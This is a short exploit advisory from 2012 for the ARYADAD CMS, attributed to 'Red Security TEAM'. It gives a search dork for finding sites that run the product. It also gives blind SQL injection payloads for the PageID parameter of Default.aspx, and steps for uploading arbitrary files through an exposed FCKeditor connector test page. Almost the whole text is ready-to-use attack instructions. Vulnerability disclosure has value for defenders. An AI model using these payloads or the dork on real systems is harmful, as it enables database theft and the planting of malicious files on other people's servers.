# # Title : ARYADAD Multi Vulnerability# Author: Red Security TEAM# Date: 21/01/2012# Vendor: http://cms.aryadad.com/# Tested On : Windows Server 2008 (IIS 7.5)# Dork: Powered by ARYADAD Corporation# Contact : Info [ 4t ] RedSecurity [ d0t ] COM# Home: http://RedSecurity.COM## Exploit :# # I : Blind SQL Injection Vulnerability# True: http://server/Default.aspx?PageID=117' and 1-1 = '0# False : http://server/Default.aspx?PageID=117' and 2-1 = '0## II: File Upload Vulnerability# 1. Go to: /FA/fckeditor/editor/filemanager/connectors/test.html# 2. Set Connector To ASP.Net and upload your file , You can see your uploaded files in FA/userfiles/file/#
